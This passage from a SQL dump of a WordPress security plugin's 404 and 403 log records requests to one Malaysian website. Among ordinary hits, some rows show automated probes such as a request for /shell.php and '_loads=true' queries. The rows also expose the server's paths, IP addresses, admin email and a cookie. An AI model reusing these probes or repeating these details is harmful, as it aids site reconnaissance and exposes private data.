deflate\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=fe044c627ee5b0a0bf1c8492e8562f17\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:27:\"https://bintara.com.my/blog\";s:15:\"HTTP_USER_AGENT\";s:55:\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:27:\"https://bintara.com.my/blog\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:5:\"/blog\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZSZ5hgmXC16hB5CLDmXyAAAAAY\";s:29:\"REDIRECT_REDIRECT_nokeepalive\";s:1:\"1\";s:38:\"REDIRECT_REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:19:\"REDIRECT_SCRIPT_URI\";s:27:\"https://bintara.com.my/blog\";s:19:\"REDIRECT_SCRIPT_URL\";s:5:\"/blog\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZSZ5hgmXC16hB5CLDmXyAAAAAY\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:13:\"165.22.196.58\";s:11:\"REMOTE_PORT\";s:5:\"47440\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:27:\"https://bintara.com.my/blog\";s:10:\"SCRIPT_URL\";s:5:\"/blog\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZSZ5hgmXC16hB5CLDmXyAAAAAY\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570019814.3317\";s:12:\"REQUEST_TIME\";s:10:\"1570019814\";}}','notice','2019-10-02 12:36:56','2019-10-02 12:36:54',35198024,37004272,'https://bintara.com.my/blog',1,0,'165.22.196.58'),(27435,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"316\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:70:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.4639; Pro)\";s:21:\"HTTP_X_FEATUREVERSION\";s:1:\"1\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:29:\"HTTP_X_MS_COOKIEURI_REQUESTED\";s:1:\"t\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"0\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:21:\"HTTP_X_OFFICE_VERSION\";s:9:\"16.0.4639\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZSWc2TGvQ0Bk@freoz52AAAAMY\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:15:\"115.164.204.255\";s:11:\"REMOTE_PORT\";s:5:\"61921\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZSWc2TGvQ0Bk@freoz52AAAAMY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570018931.5125\";s:12:\"REQUEST_TIME\";s:10:\"1570018931\";}}','notice','2019-10-02 12:22:14','2019-10-02 12:22:11',36002440,37797248,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'115.164.204.255'),(27436,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:53:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:5:\"/blog\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:27:\"https://bintara.com.my/blog\";s:15:\"HTTP_USER_AGENT\";s:55:\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:27:\"https://bintara.com.my/blog\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:5:\"/blog\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZSZyWTGvQ0Bk@freoz6OgAAANg\";s:29:\"REDIRECT_REDIRECT_nokeepalive\";s:1:\"1\";s:38:\"REDIRECT_REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:19:\"REDIRECT_SCRIPT_URI\";s:27:\"https://bintara.com.my/blog\";s:19:\"REDIRECT_SCRIPT_URL\";s:5:\"/blog\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZSZyWTGvQ0Bk@freoz6OgAAANg\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:12:\"112.66.82.18\";s:11:\"REMOTE_PORT\";s:5:\"37031\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:27:\"https://bintara.com.my/blog\";s:10:\"SCRIPT_URL\";s:5:\"/blog\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZSZyWTGvQ0Bk@freoz6OgAAANg\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570019785.8889\";s:12:\"REQUEST_TIME\";s:10:\"1570019785\";}}','notice','2019-10-02 12:36:29','2019-10-02 12:36:26',35587520,37396920,'https://bintara.com.my/blog',1,0,'112.66.82.18'),(27523,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:46:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:33:\"/oldsite/?xxxxxxxxxxxx_loads=true\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.8\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/533.36 (KHTML, like Gecko) Chrome/46.0.2754.75 Safari/533.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:31:\"https://bintara.com.my/oldsite/\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:9:\"/oldsite/\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZgfSb-TGwg8JtoKWMV0NgAAABQ\";s:19:\"REDIRECT_SCRIPT_URI\";s:31:\"https://bintara.com.my/oldsite/\";s:19:\"REDIRECT_SCRIPT_URL\";s:9:\"/oldsite/\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZgfSb-TGwg8JtoKWMV0NgAAABQ\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"37.187.132.5\";s:11:\"REMOTE_PORT\";s:5:\"51301\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:31:\"https://bintara.com.my/oldsite/\";s:10:\"SCRIPT_URL\";s:9:\"/oldsite/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZgfSb-TGwg8JtoKWMV0NgAAABQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570250569.4837\";s:12:\"REQUEST_TIME\";s:10:\"1570250569\";}}','notice','2019-10-05 04:42:53','2019-10-05 04:42:50',35032520,36842208,'https://bintara.com.my/oldsite/?xxxxxxxxxxxx_loads=true',1,0,'37.187.132.5'),(27522,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:40:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:8:\"/ads.txt\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"HTTP_CONNECTION\";s:5:\"Close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:42:\"Mozilla/5.0 (compatible; Dataprovider.com)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:30:\"https://bintara.com.my/ads.txt\";s:19:\"REDIRECT_SCRIPT_URL\";s:8:\"/ads.txt\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZgNx7-TGwg8JtoKWMVrbgAAABc\";s:12:\"REDIRECT_URL\";s:8:\"/ads.txt\";s:11:\"REMOTE_ADDR\";s:14:\"167.114.158.57\";s:11:\"REMOTE_PORT\";s:5:\"59412\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:30:\"https://bintara.com.my/ads.txt\";s:10:\"SCRIPT_URL\";s:8:\"/ads.txt\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZgNx7-TGwg8JtoKWMVrbgAAABc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570246087.8689\";s:12:\"REQUEST_TIME\";s:10:\"1570246087\";}}','notice','2019-10-05 03:28:10','2019-10-05 03:28:08',35030560,36842056,'https://bintara.com.my/ads.txt',1,0,'167.114.158.57'),(27521,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"316\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:70:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.4639; Pro)\";s:21:\"HTTP_X_FEATUREVERSION\";s:1:\"1\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:29:\"HTTP_X_MS_COOKIEURI_REQUESTED\";s:1:\"t\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"0\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:21:\"HTTP_X_OFFICE_VERSION\";s:9:\"16.0.4639\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZgLdDASB1ea8fP7LD-AYAAAARE\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"115.164.95.205\";s:11:\"REMOTE_PORT\";s:5:\"34465\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZgLdDASB1ea8fP7LD-AYAAAARE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570245492.7708\";s:12:\"REQUEST_TIME\";s:10:\"1570245492\";}}','notice','2019-10-05 03:18:15','2019-10-05 03:18:13',35785784,37594656,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'115.164.95.205'),(27520,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:46:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:32:\"/portal/?xxxxxxxxxxxx_loads=true\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.8\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/533.36 (KHTML, like Gecko) Chrome/46.0.2754.75 Safari/533.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:30:\"https://bintara.com.my/portal/\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:8:\"/portal/\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZgHezASB1ea8fP7LD@-igAAAQk\";s:19:\"REDIRECT_SCRIPT_URI\";s:30:\"https://bintara.com.my/portal/\";s:19:\"REDIRECT_SCRIPT_URL\";s:8:\"/portal/\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZgHezASB1ea8fP7LD@-igAAAQk\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"104.238.97.201\";s:11:\"REMOTE_PORT\";s:5:\"55890\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:30:\"https://bintara.com.my/portal/\";s:10:\"SCRIPT_URL\";s:8:\"/portal/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZgHezASB1ea8fP7LD@-igAAAQk\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570244475.5365\";s:12:\"REQUEST_TIME\";s:10:\"1570244475\";}}','notice','2019-10-05 03:01:19','2019-10-05 03:01:16',35033488,36841056,'https://bintara.com.my/portal/?xxxxxxxxxxxx_loads=true',1,0,'104.238.97.201'),(27519,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:47:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:10:\"/shell.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:22:\"python-requests/2.22.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:32:\"https://bintara.com.my/shell.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:10:\"/shell.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZfxHDASB1ea8fP7LD@83wAAARA\";s:19:\"REDIRECT_SCRIPT_URI\";s:32:\"https://bintara.com.my/shell.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:10:\"/shell.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZfxHDASB1ea8fP7LD@83wAAARA\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:11:\"51.79.4.180\";s:11:\"REMOTE_PORT\";s:5:\"53967\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:32:\"https://bintara.com.my/shell.php\";s:10:\"SCRIPT_URL\";s:10:\"/shell.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZfxHDASB1ea8fP7LD@83wAAARA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570238748.7653\";s:12:\"REQUEST_TIME\";s:10:\"1570238748\";}}','notice','2019-10-05 01:25:51','2019-10-05 